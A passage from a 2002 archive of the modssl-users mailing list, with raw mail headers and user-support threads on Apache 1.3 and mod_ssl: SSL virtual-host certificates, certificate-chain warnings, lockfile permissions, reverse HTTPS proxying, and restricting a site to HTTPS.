U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: APache mod-ssl problems. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-CWIE-MailScanner: Found to be clean Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ovidiu Semenea X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have installed APache 1.3.24 with openssl and mod_ssl last versions. The problem that I have is in apache conf. file. I have httpd and httpsd running and 2 diffetent config files accordingly to httpd or httpsd I also have 3 sites using ssl. My problem is that apache sees the certificate for only the first site defined in the config file, and when I go to the other two sites it takes the certificate from the first site only. I doesn't recognize the certificate I made for it in his config virtual host section. Any idea how to fix this? Thanks, Ovi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 09:42:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA24221; Fri, 5 Apr 2002 09:41:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id JAA24184; Fri, 5 Apr 2002 09:40:13 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 5F92DBD2A; Fri, 5 Apr 2002 09:40:11 +0200 (CEST) Date: Fri, 5 Apr 2002 09:40:11 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Question about errors browsers give on non-validated keys Message-ID: <20020405074011.GA13441@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <003d01c1dc59$0f54cba0$3ae57f42@cliff> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <003d01c1dc59$0f54cba0$3ae57f42@cliff> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Apr 04, 2002 at 08:19:20PM -0800, Cliff wrote: > > Opera: This sites certificate chain is incomplete and the signer is not verified, continue? > This looks like you might have to get a CA certificate chain from Thawte and put it in http://www.modssl.org/docs/2.8/ssl_reference.html#ToC12 vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 10:20:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA26239; Fri, 5 Apr 2002 10:19:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA26212; Fri, 5 Apr 2002 10:18:47 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id EC7974CE74F; Fri, 5 Apr 2002 10:18:46 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g358FKK27309; Fri, 5 Apr 2002 10:15:20 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from vonemailsweep1.voneaccount.com id JAA23037; Fri, 5 Apr 2002 09:22:42 +0200 (MET DST) Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Fri, 5 Apr 2002 08:24:09 +0100 Subject: Re: Question about errors browsers give on non-validated keys To: modssl-users@modssl.org From: mike.innes@Oneaccount.com Date: Fri, 5 Apr 2002 08:22:34 +0100 Message-ID: X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.8 |June 18, 2001) at 04/05/2002 08:22:35 AM MIME-Version: 1.0 Content-type: multipart/mixed; Boundary="0__=80256B9200275B828f9e8a93df938690918c80256B9200275B82" Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: mike.innes@Oneaccount.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --0__=80256B9200275B828f9e8a93df938690918c80256B9200275B82 Content-type: text/plain; charset="us-ascii" Cliff, http://www.modssl.org/docs/2.8/ssl_faq.html#ToC39 Thawte and Verisign work the same way if you have a GlobalID Mikey "Cliff" on 05/04/2002 04:19:20 Please respond to modssl-users@modssl.org To: modssl-users@modssl.org cc: Subject: Question about errors browsers give on non-validated keys Hi, my work bought a certificate from thawte, and it is for travelguides.com. I installed the cert and modssl is working with no problems, except when I click on a link that goes to a secure (https) part of the site, different browsers pop up this message: Netscape: travelguides.com is a site that uses encryption to protect transmitted information. However, Netscape does not recognize the authority who signed its Certificate. Although Netscape does not recognize the signer of this Certificate, you may decide to accept it anyway so that you can connect to and exchange information with this site. This assistant will help you decide whether or not you wish to accept this Certificate and to what extent. Opera: This sites certificate chain is incomplete and the signer is not verified, continue? IE: says something about it is sign but on the wrong domain. My question is, it is signed for travelguides.com but I have tried putting the https listening on secure.travelguides.com and just regular travelguides.com and I still get this prompt. How do I get rid of it? Thanks (See attached file: att1.htm) All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. --0__=80256B9200275B828f9e8a93df938690918c80256B9200275B82 Content-type: text/html; name="att1.htm" Content-Disposition: attachment; filename="att1.htm" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29udGVu dD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVudD0iTVNIVE1M IDYuMDAuMjcxNS40MDAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwvU1RZTEU+DQo8L0hFQUQ+ DQo8Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6ZT0yPkhp LCBteSB3b3JrIGJvdWdodCBhIGNlcnRpZmljYXRlIGZyb20gdGhhd3RlLCBhbmQgDQppdCBpcyBm b3IgdHJhdmVsZ3VpZGVzLmNvbS4gSSBpbnN0YWxsZWQgdGhlIGNlcnQgYW5kIG1vZHNzbCBpcyB3 b3JraW5nIHdpdGggbm8gDQpwcm9ibGVtcywgZXhjZXB0IHdoZW4gSSBjbGljayBvbiBhIGxpbmsg dGhhdCBnb2VzIHRvIGEgc2VjdXJlIChodHRwcykgcGFydCBvZiANCnRoZSBzaXRlLCBkaWZmZXJl bnQgYnJvd3NlcnMgcG9wIHVwIHRoaXMgbWVzc2FnZTo8L0ZPTlQ+PC9ESVY+DQo8RElWPjxGT05U IGZhY2U9QXJpYWwgc2l6ZT0yPjwvRk9OVD4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgZmFjZT1B cmlhbCBzaXplPTI+TmV0c2NhcGU6IHRyYXZlbGd1aWRlcy5jb20gaXMgYSBzaXRlIHRoYXQgdXNl cyANCmVuY3J5cHRpb24gdG8gcHJvdGVjdCB0cmFuc21pdHRlZDxCUj5pbmZvcm1hdGlvbi4gSG93 ZXZlciwgTmV0c2NhcGUgZG9lcyBub3QgDQpyZWNvZ25pemUgdGhlIGF1dGhvcml0eSB3aG88QlI+ c2lnbmVkIGl0cyBDZXJ0aWZpY2F0ZS48L0ZPTlQ+PC9ESVY+DQo8RElWPiZuYnNwOzwvRElWPg0K PERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9Mj5BbHRob3VnaCBOZXRzY2FwZSBkb2VzIG5vdCBy ZWNvZ25pemUgdGhlIHNpZ25lciBvZiANCnRoaXMgQ2VydGlmaWNhdGUsIHlvdSBtYXk8QlI+ZGVj aWRlIHRvIGFjY2VwdCBpdCBhbnl3YXkgc28gdGhhdCB5b3UgY2FuIGNvbm5lY3QgDQp0byBhbmQg ZXhjaGFuZ2U8QlI+aW5mb3JtYXRpb24gd2l0aCB0aGlzIHNpdGUuPC9GT05UPjwvRElWPg0KPERJ Vj4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgZmFjZT1BcmlhbCBzaXplPTI+VGhpcyBhc3Npc3Rh bnQgd2lsbCBoZWxwIHlvdSBkZWNpZGUgd2hldGhlciBvciBub3QgDQp5b3Ugd2lzaCB0byBhY2Nl cHQgdGhpczxCUj5DZXJ0aWZpY2F0ZSBhbmQgdG8gd2hhdCBleHRlbnQuPC9GT05UPjwvRElWPg0K PERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9Mj48L0ZPTlQ+Jm5ic3A7PC9ESVY+DQo8RElWPjxG T05UIGZhY2U9QXJpYWwgc2l6ZT0yPjwvRk9OVD4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgZmFj ZT1BcmlhbCBzaXplPTI+PC9GT05UPiZuYnNwOzwvRElWPg0KPERJVj48Rk9OVCBmYWNlPUFyaWFs IHNpemU9Mj5PcGVyYTogVGhpcyBzaXRlcyBjZXJ0aWZpY2F0ZSBjaGFpbiBpcyBpbmNvbXBsZXRl IA0KYW5kIHRoZSBzaWduZXIgaXMgbm90IHZlcmlmaWVkLCBjb250aW51ZT88L0ZPTlQ+PC9ESVY+ DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6ZT0yPjwvRk9OVD4mbmJzcDs8L0RJVj4NCjxESVY+ PEZPTlQgZmFjZT1BcmlhbCBzaXplPTI+SUU6IHNheXMgc29tZXRoaW5nIGFib3V0IGl0IGlzIHNp Z24gYnV0IG9uIHRoZSANCndyb25nIGRvbWFpbi48L0ZPTlQ+PC9ESVY+DQo8RElWPjxGT05UIGZh Y2U9QXJpYWwgc2l6ZT0yPjwvRk9OVD4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgZmFjZT1Bcmlh bCBzaXplPTI+PC9GT05UPiZuYnNwOzwvRElWPg0KPERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9 Mj48L0ZPTlQ+Jm5ic3A7PC9ESVY+DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6ZT0yPjwvRk9O VD4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgZmFjZT1BcmlhbCBzaXplPTI+PC9GT05UPiZuYnNw OzwvRElWPg0KPERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9Mj5NeSBxdWVzdGlvbiBpcywgaXQg aXMgc2lnbmVkIGZvciB0cmF2ZWxndWlkZXMuY29tIA0KYnV0IEkgaGF2ZSB0cmllZCBwdXR0aW5n IHRoZSBodHRwcyBsaXN0ZW5pbmcgb24gc2VjdXJlLnRyYXZlbGd1aWRlcy5jb20gYW5kIGp1c3Qg DQpyZWd1bGFyIHRyYXZlbGd1aWRlcy5jb20gYW5kIEkgc3RpbGwgZ2V0IHRoaXMgcHJvbXB0LiBI b3cgZG8gSSBnZXQgcmlkIG9mIGl0PyANClRoYW5rczwvRk9OVD48L0RJVj48L0JPRFk+PC9IVE1M Pg0K --0__=80256B9200275B828f9e8a93df938690918c80256B9200275B82-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 10:50:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA27813; Fri, 5 Apr 2002 10:49:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA27759; Fri, 5 Apr 2002 10:48:05 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA07671 for ; Fri, 5 Apr 2002 10:48:01 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma007655; Fri, 5 Apr 02 10:47:57 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA05033 for ; Fri, 5 Apr 2002 10:47:57 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA02880 for ; Fri, 5 Apr 2002 10:47:57 +0200 (MEST) Message-ID: <3CAD64BD.7E791B30@bourse.ch> Date: Fri, 05 Apr 2002 10:47:57 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache Server:Https mode References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mahesh Mahalingam wrote: > > Hi, > I have successfully installed apache with mod_ssl setup. > But i was not able to get the page in https mode. > (mod_ssl.c is also enabled.)How can i run this in https mode with > a security certificate. Well, what did you try? There are a lot of things you need to do: - set up an SSL VH - Listen 443 - SSLEngine on - define certs and key - etc. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 11:07:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA28899; Fri, 5 Apr 2002 11:06:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from syntrex.com id LAA28784; Fri, 5 Apr 2002 11:05:52 +0200 (MET DST) Received: (qmail 29660 invoked by uid 8); 5 Apr 2002 10:07:54 -0000 Received: from 212-41-210-71.adsl.galactica.it (212.41.210.71, claiming to be "mendeleev.syntrex.com") by mail.syntrex.com with SMTP id smtpdQ78y0k; Fri, 05 Apr 2002 05:07:49 EST Date: Fri, 5 Apr 2002 11:05:43 +0200 (CEST) From: Auri Mason To: modssl-users@modssl.org Subject: newbie question: ssl_mutex Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Auri Mason X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi group, I've made an installation of apache(1.3.24)+openssl+mod_ssl an all was working with a non priviledged user. Now I wont to run http on port 80/443 but: [Fri Apr 5 08:24:23 2002] [error] mod_ssl: Child could not open SSLMutex lockfile /home/mds/apache/logs/ssl_mutex.28153 (System error follows) [Fri Apr 5 08:24:23 2002] [error] System: Permission denied (errno: 13) As a root I start apache (./bin/apachectl sslstart), but inside httpd.conf I've set that the running user is nobody. [root@auri apache]# ll total 40 drwxr-xr-x 2 root root 4096 Apr 5 08:05 bin drwxr-xr-x 2 root root 4096 Apr 4 16:21 cgi-bin drwxr-xr-x 7 root root 4096 Apr 4 16:32 conf drwxr-xr-x 3 root root 4096 Apr 4 16:21 htdocs drwxr-xr-x 3 root root 4096 Apr 4 16:21 icons drwxr-xr-x 3 root root 4096 Apr 4 16:21 include drwxr-xr-x 2 root root 4096 Apr 4 16:21 libexec drwxrwxrwx 2 root root 4096 Apr 5 08:25 logs drwxr-xr-x 4 root root 4096 Apr 4 16:21 man drwxr-xr-x 2 nobody nobody 4096 Apr 4 16:21 proxy [root@auri apache]# The message shown an access denied and it's true because: [root@daniele1 apache]# ll logs/ total 1324 -rw-rw-r-- 1 root root 0 Apr 4 16:21 access_log -rw-rw-r-- 1 root root 673237 Apr 5 09:03 error_log -rw-r--r-- 1 root root 6 Apr 5 09:03 httpd.pid -rw-rw-r-- 1 root root 665799 Apr 5 09:03 ssl_engine_log -rw------- 1 nobody root 0 Apr 5 09:03 ssl_mutex.31732 -rw-rw-r-- 1 root root 0 Apr 4 16:21 ssl_request_log -rw------- 1 nobody root 0 Apr 5 09:03 ssl_scache.dir -rw------- 1 nobody root 0 Apr 5 09:03 ssl_scache.pag [root@daniele1 apache]# ONLY root can read ssl_mutex file.... What's wrong? Anyone of you can help me? TIA, Auri ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 13:37:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA07551; Fri, 5 Apr 2002 13:36:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id NAA07536; Fri, 5 Apr 2002 13:35:58 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g35BZ6C07331; Fri, 5 Apr 2002 14:35:08 +0300 Message-ID: <3CAD8BEA.D33707C0@netmask.it> Date: Fri, 05 Apr 2002 14:35:06 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org CC: dev@httpd.apache.org Subject: Apache 2.0.* and SSL Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi mod_ssl users, As most of you probably know, the development efforts of Apache 2 are going to result in a product, soon. The current betas are already stable, mature, fast, portable than ever, strong, and support many features that we have dreamed about for years, like filtering (I mention this feature, and not zillion others, because it is important specifically for SSL). Yes, it's true that some of us didn't like various things, and that the development process was not optimal and took too much time. But this effort comes (finally...) to a successful end, and I believe that everybody who uses SSL (including myself...) should do the migration. Contrary to past versions, this one is a dramatic change in the integration of SSL. No more patches, no more re-compilations with "-DEAPI", no more 3rd party modules which cause Apache to crash because these modules were not compiled using this flag, no more specific versions of mod_ssl per each version of Apache, no more repeating merges of the patches of mod_ssl. Now, thanks to the filtering feature, mod_ssl is separate, and doesn't depend on modifications in the core of Apache. Thanks to the White House, mod_ssl is not a national secret that can't be distributed, anymore. Thanks to the USPTO, mod_ssl doesn't depend on a protected patent anymore (it expired. RSA even gave up 2 weeks). And thanks to ASF, mod_ssl is a standard part of Apache. Any Apache that will be distributed in the future, will include SSL support (at least optionally), that can be enabled externally by installing OpenSSL and adding some directives to the httpd.conf. Ben did a great job by creating apache_ssl. Ralf did a great job too, by improving it, and his impressive efforts and skills that were invested in developing and maintaining mod_ssl. We all owe a great thank to Ralf for other Open Source projects that he does, or joins. Now it's time to make the next step, and migrate to Apache 2.0. It still requires some work and testing. It can happen if we all join this effort. I am not a member of ASF, but I'm convinced that everybody will accept you happily. -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 13:51:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA07999; Fri, 5 Apr 2002 13:50:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA07951; Fri, 5 Apr 2002 13:49:36 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id A98D54CE618; Fri, 5 Apr 2002 13:49:35 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g35AuJj30615; Fri, 5 Apr 2002 12:56:19 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.designlinks.net id LAA29136; Fri, 5 Apr 2002 11:09:05 +0200 (MET DST) Received: from ayakub (host62-7-75-163.in-addr.btopenworld.com [62.7.75.163]) by ns.designlinks.net (8.10.2/8.10.2) with SMTP id g359Icc25100 for ; Fri, 5 Apr 2002 10:18:38 +0100 Received: by localhost with Microsoft MAPI; Fri, 5 Apr 2002 10:11:36 +0100 Message-ID: <01C1DC8A.45262590.shiraz.esat@designlinks.net> From: Shiraz Esat To: "'modssl-users@modssl.org'" Subject: RE: test installed certificates Date: Fri, 5 Apr 2002 10:11:35 +0100 X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiraz Esat X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Arnaud, If the given file is already installed browsers won't display any error/warning messages. Messages are only displayed if the browser hasn't installed your certificate. This problem is unlikely to occur if you get a certificate from a well-known issuing authority (Verisign, Thawte, etc), and more likely than not to occur if you use a self-signed certificate. If your 'audience' are limitted, you could either send them a 'client certificate', or reassure them that when they see the message for the first time that nothing is wrong and they should agree to continue into your secure site. As to initial question (can the server determine if the root ca is installed on the browser), I doubt it. Hope that helps :) Shiraz -----Original Message----- From: Arnaud De Timmerman [SMTP:Arnaud.De.Timmerman@urssaf.fr] Sent: Thursday, April 04, 2002 3:36 PM To: modssl-users@modssl.org Subject: test installed certificates hi, i don't know if this list is the best for my question, my deepest apologies if not is there a way to know thanks to apache and/or modssl if a given root ca is installed on the client side (browser) ? what i want to avoid is a page like : ******************************* click here to install our root CA ___________________ ******************************* if the given file is already installed thanks all ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 13:51:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA08002; Fri, 5 Apr 2002 13:50:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA07953; Fri, 5 Apr 2002 13:49:36 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id D85844CE72D; Fri, 5 Apr 2002 13:49:35 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g35AuVK30627; Fri, 5 Apr 2002 12:56:31 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from proxy.sixt.de id MAA04515; Fri, 5 Apr 2002 12:45:12 +0200 (MET DST) Received: (from root@localhost) by proxy.sixt.de (8.9.3/8.9.3) id MAA00401 for modssl-users@modssl.org; Fri, 5 Apr 2002 12:43:09 +0200 Content-Type: TEXT/PLAIN; charset=US-ASCII Date: Fri, 5 Apr 2002 12:44:41 +0200 (CEST) From: Hans Juergen von Lengerke In-Reply-To: Message-ID: MIME-Version: 1.0 Received: from windsor.sixt.de ([192.168.21.100] [192.168.21.100]) by proxy.sixt.de (AvMailGate-6.13.0.1) id 00216-03F28BF1; Fri, 05 Apr 2002 12:42:39 +0200 Subject: reverse https proxying fails after upgrade from apache 1.3.11 to 1.3.24 To: X-AntiVirus: OK! AvMailGate Version 6.13.0.6 at proxy has not found any known virus in this email. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Hans Juergen von Lengerke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users After upgrading our apache from 1.3.11 to 1.3.24 I can't map remote servers into the space of the local server if I try to do so via https. The relevant part of httpd.conf: ServerName www.ourserver.com SSLEngine on RewriteRule ^/example/(.*)$ https://www.example.com/$1 [P,L] ProxyPassReverse /example https://www.example.com/ Requesting https://www.ourserver.com/example/ fails for apache_1.3.24 (+mod_rewrite +mod_proxy +mod_ssl-2.8.8-1.3.24) / openssl-0.9.6b. The failure message in the browser is: Bad Request Your browser sent a request that this server could not understand. Reason: You're speaking plain HTTP to an SSL-enabled server port. Instead use the HTTPS scheme to access this URL, please. Hint: https://www.example.de:443/ ------------------------------------------------------------------ Apache/1.3.20 Server at www.example.com Port 443 After reinstalling apache_1.3.11 (+mod_rewrite +mod_proxy +mod_ssl-2.5.1-1.3.11) / openssl-0.9.6b the request to https://www.ourserver.com/example/ works just as expected. I have to admit, I didn't change the httpd.conf at all when I upgraded. But I did a diff on the apache-src/conf/httpd.conf-dist to see if it had something to do with configuration changes between the two versions. However, I haven't found anything obvious there. Any ideas what I am doing wrong? Can someone verify that reverse https proxying in this manner actually works with apache_1.3.24? I know there were quite a lot of changes to mod_proxy recently, maybe something broke along the way. Thanks, Hans ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 17:01:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA19909; Fri, 5 Apr 2002 17:00:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from jedi.hbs.net id QAA19842; Fri, 5 Apr 2002 16:59:36 +0200 (MET DST) Received: from nefertiti.hbs.net (nat-side.hbs.net [65.112.67.4]) by jedi.hbs.net (Post.Office MTA v3.5.3 release 223 ID# 0-58333U400L100S0V35) with ESMTP id net for ; Fri, 5 Apr 2002 08:57:57 -0600 Received: (from pez@localhost) by nefertiti.hbs.net (8.11.6/8.11.6) id g35F1G200953 for modssl-users@modssl.org; Fri, 5 Apr 2002 09:01:16 -0600 Date: Fri, 5 Apr 2002 09:01:16 -0600 From: CJ Kucera To: modssl-users@modssl.org Subject: Respond only to SSL requests? Message-ID: <20020405090116.C688@hbs.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: CJ Kucera X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, list . . . I've got a website that uses Apache, mod_ssl and HTTP authentication. Apache only listens on one port, and the only protocol I want to support on it is HTTPS. This is almost working okay: Apache won't serve up any pages if the client is using ordinary HTTP. It just gives a "Bad Request" response. However, because I'm using HTTP authentication, Apache still challenges the browser even if it's trying to use HTTP, which means that if someone mistypes the URL (typing http://host:port/ instead of https://host:port/), the password will be sent over the internet without encryption. Granted, Apache won't actually serve up any PAGES once the user's authenticated over HTTP (it'll just throw the "Bad Request" message), but I'd rather that the passwords couldn't be sent that way at all. Is there any way to get Apache to completely disregard any regular HTTP traffic? I'm running Apache 1.3.24 and mod_ssl 2.8.8. Thanks much in advance, and apologies for the badly-worded request. My communication skills seem to be severely malfunctioning this morning. :) -CJ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 17:14:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA20823; Fri, 5 Apr 2002 17:13:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id RAA20805; Fri, 5 Apr 2002 17:12:28 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Fri, 5 Apr 2002 07:12:21 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D8B@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: Respond only to SSL requests? Date: Fri, 5 Apr 2002 07:12:12 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I use an unsecured Virtual Host on my HTTP side and redirect all requests to HTTPS using a "Redirect seeother". -----Original Message----- From: CJ Kucera [mailto:ckucera@hbs.net] Sent: Friday, April 05, 2002 7:01 AM To: modssl-users@modssl.org Subject: Respond only to SSL requests? Hello, list . . . I've got a website that uses Apache, mod_ssl and HTTP authentication. Apache only listens on one port, and the only protocol I want to support on it is HTTPS. This is almost working okay: Apache won't serve up any pages if the client is using ordinary HTTP. It just gives a "Bad Request" response. However, because I'm using HTTP authentication, Apache still challenges the browser even if it's trying to use HTTP, which means that if 